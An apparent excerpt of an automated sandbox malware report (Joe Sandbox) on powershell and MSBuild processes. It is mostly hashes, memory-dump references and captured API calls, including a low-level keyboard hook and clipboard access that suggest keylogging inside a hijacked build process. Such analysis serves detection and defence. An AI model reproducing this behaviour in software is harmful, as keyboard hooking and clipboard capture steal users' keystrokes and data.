                                                                  • Opcode Fuzzy Hash: b1be2a0bde41e2be1bb8ea6f620a1ad949ccfe4b83f34a0b9e5eda3fa3a39b9e
                                                                  • Instruction Fuzzy Hash: 13415E74A016058FCB14DF9AC8849AEB7F1FF89320B248559E519E7395D739FC41CBA0
                                                                  Uniqueness

                                                                  Uniqueness Score: -1.00%

                                                                  Memory Dump Source
                                                                  • Source File: 00000004.00000002.1605916173.00000000075C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 075C0000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_4_2_75c0000_powershell.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID:
                                                                  • API String ID:
                                                                  • Opcode ID: dfad291919ff237683a0877bbd0e92dc78f0d92ca68ff3a42ac2a5f2798cee19
                                                                  • Instruction ID: 7b63fc8ff93ee56e22ace83a50dec4456f32cf7339f0095f622a9d52858f4058
                                                                  • Opcode Fuzzy Hash: dfad291919ff237683a0877bbd0e92dc78f0d92ca68ff3a42ac2a5f2798cee19
                                                                  • Instruction Fuzzy Hash: 5231B3B0B00214AFE704E764C964FAEB6B3AFC5754F208419E9017F791CFB69D818BA1
                                                                  Uniqueness

                                                                  Uniqueness Score: -1.00%

                                                                  Memory Dump Source
                                                                  • Source File: 00000004.00000002.1605916173.00000000075C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 075C0000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_4_2_75c0000_powershell.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID:
                                                                  • API String ID:
                                                                  • Opcode ID: 9514781e2408c8a87682927e0fbf851c5defa212d01707552feccc9479989f6c
                                                                  • Instruction ID: 8bf1ec91d741975fc07bd686f527300e4df0ea8e550c546e46cf40c0b9379921
                                                                  • Opcode Fuzzy Hash: 9514781e2408c8a87682927e0fbf851c5defa212d01707552feccc9479989f6c
                                                                  • Instruction Fuzzy Hash: 6A3194B1A0424FDFEB21CAE59A457E57FB0BF06220F15C1AFD4049B152E731C986C792
                                                                  Uniqueness

                                                                  Uniqueness Score: -1.00%

                                                                  Memory Dump Source
                                                                  • Source File: 00000004.00000002.1605916173.00000000075C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 075C0000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_4_2_75c0000_powershell.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID:
                                                                  • API String ID:
                                                                  Uniqueness

                                                                  Uniqueness Score: -1.00%

                                                                  Memory Dump Source
                                                                  • Source File: 00000004.00000002.1602071727.0000000004AE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 04AE0000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_4_2_4ae0000_powershell.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID:
                                                                  • API String ID:
                                                                  Uniqueness

                                                                  Uniqueness Score: -1.00%

                                                                  Memory Dump Source
                                                                  • Source File: 00000004.00000002.1602071727.0000000004AE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 04AE0000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_4_2_4ae0000_powershell.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID:
                                                                  • API String ID:
                                                                  Uniqueness

                                                                  Uniqueness Score: -1.00%

                                                                  Memory Dump Source
                                                                  • Source File: 00000004.00000002.1602071727.0000000004AE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 04AE0000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_4_2_4ae0000_powershell.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID:
                                                                  • API String ID:
                                                                  Uniqueness

                                                                  Uniqueness Score: -1.00%

                                                                  Memory Dump Source
                                                                  • Source File: 00000004.00000002.1602071727.0000000004AE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 04AE0000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_4_2_4ae0000_powershell.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID:
                                                                  • API String ID:
                                                                  Uniqueness

                                                                  Uniqueness Score: -1.00%

                                                                  Memory Dump Source
                                                                  • Source File: 00000004.00000002.1602071727.0000000004AE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 04AE0000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_4_2_4ae0000_powershell.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID:
                                                                  • API String ID:
                                                                  Uniqueness

                                                                  Uniqueness Score: -1.00%

                                                                  Memory Dump Source
                                                                  • Source File: 00000004.00000002.1602071727.0000000004AE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 04AE0000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_4_2_4ae0000_powershell.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID:
                                                                  • API String ID:
                                                                  Uniqueness

                                                                  Uniqueness Score: -1.00%

                                                                  Memory Dump Source
                                                                  • Source File: 00000004.00000002.1602071727.0000000004AE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 04AE0000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_4_2_4ae0000_powershell.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID:
                                                                  • API String ID:
                                                                  Uniqueness

                                                                  Uniqueness Score: -1.00%

                                                                  Memory Dump Source
                                                                  • Source File: 00000004.00000002.1602071727.0000000004AE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 04AE0000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_4_2_4ae0000_powershell.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID:
                                                                  • API String ID:
                                                                  Uniqueness

                                                                  Uniqueness Score: -1.00%

                                                                  Memory Dump Source
                                                                  • Source File: 00000004.00000002.1602071727.0000000004AE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 04AE0000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_4_2_4ae0000_powershell.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID:
                                                                  • API String ID:
                                                                  Uniqueness

                                                                  Uniqueness Score: -1.00%

                                                                  Memory Dump Source
                                                                  • Source File: 00000004.00000002.1602071727.0000000004AE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 04AE0000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_4_2_4ae0000_powershell.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID:
                                                                  • API String ID:
                                                                  Uniqueness

                                                                  Uniqueness Score: -1.00%

                                                                  Memory Dump Source
                                                                  • Source File: 00000004.00000002.1602071727.0000000004AE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 04AE0000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_4_2_4ae0000_powershell.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID:
                                                                  • API String ID:
                                                                  Uniqueness

                                                                  Uniqueness Score: -1.00%

                                                                  Memory Dump Source
                                                                  • Source File: 00000004.00000002.1601666913.0000000000F5D000.00000040.00000800.00020000.00000000.sdmp, Offset: 00F5D000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_4_2_f5d000_powershell.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID:
                                                                  • API String ID:
                                                                  Uniqueness

                                                                  Uniqueness Score: -1.00%

                                                                  Memory Dump Source
                                                                  • Source File: 00000004.00000002.1601666913.0000000000F5D000.00000040.00000800.00020000.00000000.sdmp, Offset: 00F5D000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_4_2_f5d000_powershell.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID:
                                                                  • API String ID:
                                                                  Uniqueness

                                                                  Uniqueness Score: -1.00%

                                                                  Memory Dump Source
                                                                  • Source File: 00000004.00000002.1601666913.0000000000F5D000.00000040.00000800.00020000.00000000.sdmp, Offset: 00F5D000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_4_2_f5d000_powershell.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID:
                                                                  • API String ID:
                                                                  Uniqueness

                                                                  Uniqueness Score: -1.00%

                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000004.00000002.1605916173.00000000075C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 075C0000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_4_2_75c0000_powershell.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID: (fl$(fl$(fl$(fl
                                                                  • API String ID: 0-2123353879
                                                                  Uniqueness

                                                                  Uniqueness Score: -1.00%

                                                                  Execution Graph

                                                                  Execution Coverage: 12.6%
                                                                  Dynamic/Decrypted Code Coverage: 98.5%
                                                                  Signature Coverage: 1.5%
                                                                  Total number of Nodes: 205
                                                                  Total number of Limit Nodes: 28
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000005.00000002.2633153076.0000000023230000.00000040.00000800.00020000.00000000.sdmp, Offset: 23230000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_5_2_23230000_MSBuild.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID: T6{"$T6{"$p%{"
                                                                  • API String ID: 0-895129875
                                                                  • Opcode ID: 7448454ddb560a368d49b2e1dc32a5cb040d16e2ee14cd782b1503f71434f404
                                                                  • Instruction ID: d7a1d8606c1b5d9e1cfe6230cb87580f06177f140325adbc515f9316e30b5272
                                                                  • Opcode Fuzzy Hash: 7448454ddb560a368d49b2e1dc32a5cb040d16e2ee14cd782b1503f71434f404
                                                                  • Instruction Fuzzy Hash: 0ED27A70A10315CFDB14EB68C994A9DB7B2FF8A310F54C5A9D409AB362DB35ED85CB80
                                                                  Uniqueness

                                                                  Uniqueness Score: -1.00%

                                                                  APIs
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000005.00000002.2588095660.0000000001130000.00000040.00000400.00020000.00000000.sdmp, Offset: 01130000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_5_2_1130000_MSBuild.jbxd
                                                                  Similarity
                                                                  • API ID: TerminateThread
                                                                  • String ID: !$'+
                                                                  • API String ID: 1852365436-1895281246
                                                                  • Opcode ID: ce1170fe8fd34c51e907ca2c7eabf5b907fb7f31703edad3c69e2ab146599fce
                                                                  • Instruction ID: 8c3a1b456913f859aa7fb418372abbff497222fd391ad92c602967a21b8a323d
                                                                  • Opcode Fuzzy Hash: ce1170fe8fd34c51e907ca2c7eabf5b907fb7f31703edad3c69e2ab146599fce
                                                                  • Instruction Fuzzy Hash: 6981E2756013569FDB299D3C8CA13EA3BF3AF96294FA4822BCC91C7685D73184878B41
                                                                  Uniqueness

                                                                  Uniqueness Score: -1.00%

                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000005.00000002.2633153076.0000000023230000.00000040.00000800.00020000.00000000.sdmp, Offset: 23230000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_5_2_23230000_MSBuild.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID: $
                                                                  • API String ID: 0-3993045852
                                                                  • Opcode ID: f4f64c1a4d53340f250a263f34b0fae2e259a64e1cafa774f753bf659b9d2ee3
                                                                  • Instruction ID: 617be79a2aa7352e60d01abdcd8158b8a2b437221e351a9b3173ed2a51ad6a0f
                                                                  • Opcode Fuzzy Hash: f4f64c1a4d53340f250a263f34b0fae2e259a64e1cafa774f753bf659b9d2ee3
                                                                  • Instruction Fuzzy Hash: EC22C571E002198FDB10DBA4C89069EBBFAFF86310F2985A9D409EB345DB35DD85CB90
                                                                  Uniqueness

                                                                  Uniqueness Score: -1.00%

                                                                  APIs
                                                                  • SetWindowsHookExA.USER32(0000000D,00000000,?,?,?,?,?,?,?,?,?,2322D1F8,00000000,00000000), ref: 2322D40B
                                                                  Memory Dump Source
                                                                  • Source File: 00000005.00000002.2632971791.0000000023220000.00000040.00000800.00020000.00000000.sdmp, Offset: 23220000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_5_2_23220000_MSBuild.jbxd
                                                                  Similarity
                                                                  • API ID: HookWindows
                                                                  • String ID:
                                                                  • API String ID: 2559412058-0
                                                                  • Opcode ID: 1d5f0fe8c634702f3cca32bb9dbe281ea2933a5ed502d840dfc9a96d1962af49
                                                                  • Instruction ID: 6b80e450585a96f57c0408f5166f88599757149799e4a81426a268a23c8c56a1
                                                                  • Opcode Fuzzy Hash: 1d5f0fe8c634702f3cca32bb9dbe281ea2933a5ed502d840dfc9a96d1962af49
                                                                  • Instruction Fuzzy Hash: E6212771D006099FDB14DFAAD844BEEFBF5EF88310F10842AE429A7250C774A944CFA5
                                                                  Uniqueness

                                                                  Uniqueness Score: -1.00%

                                                                  Memory Dump Source
                                                                  • Source File: 00000005.00000002.2633153076.0000000023230000.00000040.00000800.00020000.00000000.sdmp, Offset: 23230000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_5_2_23230000_MSBuild.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID:
                                                                  • API String ID:
                                                                  • Opcode ID: 89816946d80f619bfb36538dabbee2d012c1de93cf128ed053e94a5a08e7846c
                                                                  • Instruction ID: 74bc556ad1dc9f1ebb3377104580e9967abe019784b20cdc680e66eb6e4090f1
                                                                  • Opcode Fuzzy Hash: 89816946d80f619bfb36538dabbee2d012c1de93cf128ed053e94a5a08e7846c
                                                                  • Instruction Fuzzy Hash: CD32B170B002158FDB04EF68CC90B9EB7B6EB8A310F149965D505EB352DB39ED81CB91
                                                                  Uniqueness

                                                                  Uniqueness Score: -1.00%

                                                                  Memory Dump Source
                                                                  • Source File: 00000005.00000002.2633153076.0000000023230000.00000040.00000800.00020000.00000000.sdmp, Offset: 23230000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_5_2_23230000_MSBuild.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID:
                                                                  • API String ID:
                                                                  • Opcode ID: 6871d20d1d0a937a46ae9fe1ba1039f307d91c2388ce4f05683843602458b95a
                                                                  • Instruction ID: 8e4be7ae3b6510c9fdbde0ea436e8e7bddc8a92bbf35eb3fc4a8d915a44a4aa5
                                                                  • Opcode Fuzzy Hash: 6871d20d1d0a937a46ae9fe1ba1039f307d91c2388ce4f05683843602458b95a
                                                                  • Instruction Fuzzy Hash: 102262B0B0020A8FEB14EF59D894B9DB7B6EB86310F688565E405DB392DB38DDC1CB51
                                                                  Uniqueness

                                                                  Uniqueness Score: -1.00%

                                                                  Memory Dump Source
                                                                  • Source File: 00000005.00000002.2633153076.0000000023230000.00000040.00000800.00020000.00000000.sdmp, Offset: 23230000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_5_2_23230000_MSBuild.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID:
                                                                  • API String ID:
                                                                  • Opcode ID: 136b4bbfe333dc1417402ef2dbca834442f41617d2ecec19cf4c5a3f4e4e6652
                                                                  • Instruction ID: 554ebb347e99bdf004f5972e64eb108f42ef08da77f97ec6cad93189c3be2bb7
                                                                  • Opcode Fuzzy Hash: 136b4bbfe333dc1417402ef2dbca834442f41617d2ecec19cf4c5a3f4e4e6652
                                                                  • Instruction Fuzzy Hash: 5AE12B71B001158FDB04DB68C884A5EBBFEFF8A710F2585AAE54ADB352CA31DD81C790
                                                                  Uniqueness

                                                                  Uniqueness Score: -1.00%

                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000005.00000002.2633153076.0000000023230000.00000040.00000800.00020000.00000000.sdmp, Offset: 23230000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_5_2_23230000_MSBuild.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID: T6{"$p%{"
                                                                  • API String ID: 0-1447899720
                                                                  • Opcode ID: 5db935c3ed9b4ce93dc0a1b575ed2517acf71507acc4fd1b3bd3faa9f46e2b8c
                                                                  • Instruction ID: 0c84e28f010645758b5f14e2b9eb291595af04c0af74f0283eff549073a00cb5
                                                                  • Opcode Fuzzy Hash: 5db935c3ed9b4ce93dc0a1b575ed2517acf71507acc4fd1b3bd3faa9f46e2b8c
                                                                  • Instruction Fuzzy Hash: 6502CF74B00205CFDB14EB68C894B9DB7FAEF85310F1884A9E409AB391DB75ED81CB90
                                                                  Uniqueness

                                                                  Uniqueness Score: -1.00%

                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000005.00000002.2633153076.0000000023230000.00000040.00000800.00020000.00000000.sdmp, Offset: 23230000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_5_2_23230000_MSBuild.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID: `>{"$`>{"
                                                                  • API String ID: 0-3055526701
                                                                  • Opcode ID: 4dbedbcb7e22a0ca502bf838532ef0da71a4d8290c087f634af1ced666d13a92
                                                                  • Instruction ID: 17340e884f40ba7d4be3ed9873b8dd99a79ac918a2c5aa1590bb0197877fc601
                                                                  • Opcode Fuzzy Hash: 4dbedbcb7e22a0ca502bf838532ef0da71a4d8290c087f634af1ced666d13a92
                                                                  • Instruction Fuzzy Hash: 3B619374F00208DFEB549BA4C854BAEBBF6EF89700F208569E509EB395DB754D41CB90
                                                                  Uniqueness

                                                                  Uniqueness Score: -1.00%

                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000005.00000002.2590491529.0000000004230000.00000040.00000800.00020000.00000000.sdmp, Offset: 04230000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_5_2_4230000_MSBuild.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID: Pn#$x#1#
                                                                  • API String ID: 0-2444507616
                                                                  • Opcode ID: 71d329c170f79bf387bee4f300502a0156aa4a4a7d0336f70b77c704fee5e14a
                                                                  • Instruction ID: 7489b50c61a77b73a4e38afc44f591eff5601779778fbfcc67397e87eabea225
                                                                  • Opcode Fuzzy Hash: 71d329c170f79bf387bee4f300502a0156aa4a4a7d0336f70b77c704fee5e14a
                                                                  • Instruction Fuzzy Hash: 9211DC707113068FD3199F74D89066A77B6FB857047208A6DC15A9B291DF359D06CB80
                                                                  Uniqueness

                                                                  Uniqueness Score: -1.00%

                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000005.00000002.2590491529.0000000004230000.00000040.00000800.00020000.00000000.sdmp, Offset: 04230000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_5_2_4230000_MSBuild.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID: Pn#$x#1#
                                                                  • API String ID: 0-2444507616
                                                                  • Opcode ID: c66873613829d8d1f134b93f132fd012da590c76883a1d33514bbfa5f1a9af74
                                                                  • Instruction ID: 4090138de08239a38785b3d8f781a9a5467a13736d0b783922b068b61c85585f
                                                                  • Opcode Fuzzy Hash: c66873613829d8d1f134b93f132fd012da590c76883a1d33514bbfa5f1a9af74
                                                                  • Instruction Fuzzy Hash: AD11BF7031130ACFD318AF69D890A6AB7FAFB857547208A3CD11A9B384DF35AD05CB90
                                                                  Uniqueness

                                                                  Uniqueness Score: -1.00%

                                                                  Memory Dump Source
                                                                  • Source File: 00000005.00000002.2587147504.0000000000AB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00AB0000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_5_2_ab0000_MSBuild.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID:
                                                                  • API String ID:
                                                                  • Opcode ID: 6574e8e204f3d752564ef17fcd99b563ae9654deb8704dcf250cb927d96a6ed0
                                                                  • Instruction ID: bae2098f791a105f0e77b62af5363c71b4353e8d7cf57e0ff1d7866e677f4833
                                                                  • Opcode Fuzzy Hash: 6574e8e204f3d752564ef17fcd99b563ae9654deb8704dcf250cb927d96a6ed0
                                                                  • Instruction Fuzzy Hash: 6B412572D143599FDB04DF79D8047DEBBF9AF89310F14856AD404A7241DBB89884CBD0
                                                                  Uniqueness

                                                                  Uniqueness Score: -1.00%

                                                                  APIs
                                                                  • CreateWindowExW.USER32(?,?,?,?,?,?,0000000C,?,?,?,?,?), ref: 23225FCA
                                                                  Memory Dump Source
                                                                  • Source File: 00000005.00000002.2632971791.0000000023220000.00000040.00000800.00020000.00000000.sdmp, Offset: 23220000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_5_2_23220000_MSBuild.jbxd
                                                                  Similarity
                                                                  • API ID: CreateWindow
                                                                  • String ID:
                                                                  • API String ID: 716092398-0
                                                                  • Opcode ID: 463eaf76c08bd8024b1998e4e8a76210f4874c52f1abe7380f8517517c3dad61
                                                                  • Instruction ID: da244c53bc239910b7c6ec41679e7e72432892fe896321a577b8f42fba19d676
                                                                  • Opcode Fuzzy Hash: 463eaf76c08bd8024b1998e4e8a76210f4874c52f1abe7380f8517517c3dad61
                                                                  • Instruction Fuzzy Hash: 4E51C2B1C107499FDB14CFAAC884ADEFFB5BF48310F24816AE819AB210D7759985CF94
                                                                  Uniqueness

                                                                  Uniqueness Score: -1.00%

                                                                  APIs
                                                                  • CreateWindowExW.USER32(?,?,?,?,?,?,0000000C,?,?,?,?,?), ref: 23225FCA
                                                                  Memory Dump Source
                                                                  • Source File: 00000005.00000002.2632971791.0000000023220000.00000040.00000800.00020000.00000000.sdmp, Offset: 23220000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_5_2_23220000_MSBuild.jbxd
                                                                  Similarity
                                                                  • API ID: CreateWindow
                                                                  • String ID:
                                                                  • API String ID: 716092398-0
                                                                  Uniqueness

                                                                  Uniqueness Score: -1.00%

                                                                  APIs
                                                                  • CallWindowProcW.USER32(?,?,?,?,?), ref: 2322ABD1
                                                                  Memory Dump Source
                                                                  • Source File: 00000005.00000002.2632971791.0000000023220000.00000040.00000800.00020000.00000000.sdmp, Offset: 23220000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_5_2_23220000_MSBuild.jbxd
                                                                  Similarity
                                                                  • API ID: CallProcWindow
                                                                  • String ID:
                                                                  • API String ID: 2714655100-0
                                                                  Uniqueness

                                                                  Uniqueness Score: -1.00%

                                                                  APIs
                                                                  Memory Dump Source
                                                                  • Source File: 00000005.00000002.2632971791.0000000023220000.00000040.00000800.00020000.00000000.sdmp, Offset: 23220000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_5_2_23220000_MSBuild.jbxd
                                                                  Similarity
                                                                  • API ID: Clipboard
                                                                  • String ID:
                                                                  • API String ID: 220874293-0
                                                                  Uniqueness

                                                                  Uniqueness Score: -1.00%

                                                                  APIs
                                                                  Memory Dump Source
                                                                  • Source File: 00000005.00000002.2632971791.0000000023220000.00000040.00000800.00020000.00000000.sdmp, Offset: 23220000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_5_2_23220000_MSBuild.jbxd
                                                                  Similarity
                                                                  • API ID: Clipboard
                                                                  • String ID:
                                                                  • API String ID: 220874293-0
                                                                  Uniqueness

                                                                  Uniqueness Score: -1.00%

                                                                  APIs
                                                                  • DuplicateHandle.KERNELBASE(?,?,?,?,?,?,?), ref: 23229D07
                                                                  Memory Dump Source
                                                                  • Source File: 00000005.00000002.2632971791.0000000023220000.00000040.00000800.00020000.00000000.sdmp, Offset: 23220000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_5_2_23220000_MSBuild.jbxd
                                                                  Similarity
                                                                  • API ID: DuplicateHandle
                                                                  • String ID:
                                                                  • API String ID: 3793708945-0
                                                                  Uniqueness

                                                                  Uniqueness Score: -1.00%

                                                                  APIs
                                                                  • DuplicateHandle.KERNELBASE(?,?,?,?,?,?,?), ref: 23229D07
                                                                  Memory Dump Source
                                                                  • Source File: 00000005.00000002.2632971791.0000000023220000.00000040.00000800.00020000.00000000.sdmp, Offset: 23220000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_5_2_23220000_MSBuild.jbxd
                                                                  Similarity
                                                                  • API ID: DuplicateHandle
                                                                  • String ID:
                                                                  • API String ID: 3793708945-0
                                                                  Uniqueness

                                                                  Uniqueness Score: -1.00%

                                                                  APIs
                                                                  • SetWindowsHookExA.USER32(0000000D,00000000,?,?,?,?,?,?,?,?,?,2322D1F8,00000000,00000000), ref: 2322D40B
                                                                  Memory Dump Source
                                                                  • Source File: 00000005.00000002.2632971791.0000000023220000.00000040.00000800.00020000.00000000.sdmp, Offset: 23220000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_5_2_23220000_MSBuild.jbxd
                                                                  Similarity
                                                                  • API ID: HookWindows
                                                                  • String ID:
                                                                  • API String ID: 2559412058-0
                                                                  Uniqueness

                                                                  Uniqueness Score: -1.00%

                                                                  APIs
                                                                  • GlobalMemoryStatusEx.KERNEL32(?,?,?,?,?,?,?,?,?,00000000), ref: 00ABEE8F
                                                                  Memory Dump Source
                                                                  • Source File: 00000005.00000002.2587147504.0000000000AB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00AB0000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_5_2_ab0000_MSBuild.jbxd
                                                                  Similarity
                                                                  • API ID: GlobalMemoryStatus
                                                                  • String ID:
                                                                  • API String ID: 1890195054-0
                                                                  Uniqueness

                                                                  Uniqueness Score: -1.00%

                                                                  APIs
                                                                  • GetModuleHandleW.KERNEL32(00000000), ref: 23224E76
                                                                  Memory Dump Source
                                                                  • Source File: 00000005.00000002.2632971791.0000000023220000.00000040.00000800.00020000.00000000.sdmp, Offset: 23220000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_5_2_23220000_MSBuild.jbxd
                                                                  Similarity
                                                                  • API ID: HandleModule
                                                                  • String ID:
                                                                  • API String ID: 4139908857-0
                                                                  Uniqueness

                                                                  Uniqueness Score: -1.00%

                                                                  APIs
                                                                  • GetModuleHandleW.KERNEL32(00000000), ref: 23224E76
                                                                  Memory Dump Source
                                                                  • Source File: 00000005.00000002.2632971791.0000000023220000.00000040.00000800.00020000.00000000.sdmp, Offset: 23220000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_5_2_23220000_MSBuild.jbxd
                                                                  Similarity
                                                                  • API ID: HandleModule
                                                                  • String ID:
                                                                  • API String ID: 4139908857-0
                                                                  Uniqueness

                                                                  Uniqueness Score: -1.00%

                                                                  APIs
                                                                  • OleInitialize.OLE32(00000000), ref: 2322B36D
                                                                  Memory Dump Source
                                                                  • Source File: 00000005.00000002.2632971791.0000000023220000.00000040.00000800.00020000.00000000.sdmp, Offset: 23220000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_5_2_23220000_MSBuild.jbxd
                                                                  Similarity
                                                                  • API ID: Initialize
                                                                  • String ID:
                                                                  • API String ID: 2538663250-0
                                                                  Uniqueness

                                                                  Uniqueness Score: -1.00%

                                                                  APIs
                                                                  • KiUserCallbackDispatcher.NTDLL(?,?,?,?,?,2322AE25), ref: 2322AEAF
                                                                  Memory Dump Source
                                                                  • Source File: 00000005.00000002.2632971791.0000000023220000.00000040.00000800.00020000.00000000.sdmp, Offset: 23220000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_5_2_23220000_MSBuild.jbxd
                                                                  Similarity
                                                                  • API ID: CallbackDispatcherUser
                                                                  • String ID:
                                                                  • API String ID: 2492992576-0
                                                                  Uniqueness

                                                                  Uniqueness Score: -1.00%

                                                                  APIs
                                                                  • OleInitialize.OLE32(00000000), ref: 2322B36D
                                                                  Memory Dump Source
                                                                  • Source File: 00000005.00000002.2632971791.0000000023220000.00000040.00000800.00020000.00000000.sdmp, Offset: 23220000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_5_2_23220000_MSBuild.jbxd
                                                                  Similarity
                                                                  • API ID: Initialize
                                                                  • String ID:
                                                                  • API String ID: 2538663250-0
                                                                  Uniqueness

                                                                  Uniqueness Score: -1.00%

                                                                  APIs
                                                                  • KiUserCallbackDispatcher.NTDLL(?,?,?,?,?,2322AE25), ref: 2322AEAF
                                                                  Memory Dump Source
                                                                  • Source File: 00000005.00000002.2632971791.0000000023220000.00000040.00000800.00020000.00000000.sdmp, Offset: 23220000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_5_2_23220000_MSBuild.jbxd
                                                                  Similarity
                                                                  • API ID: CallbackDispatcherUser
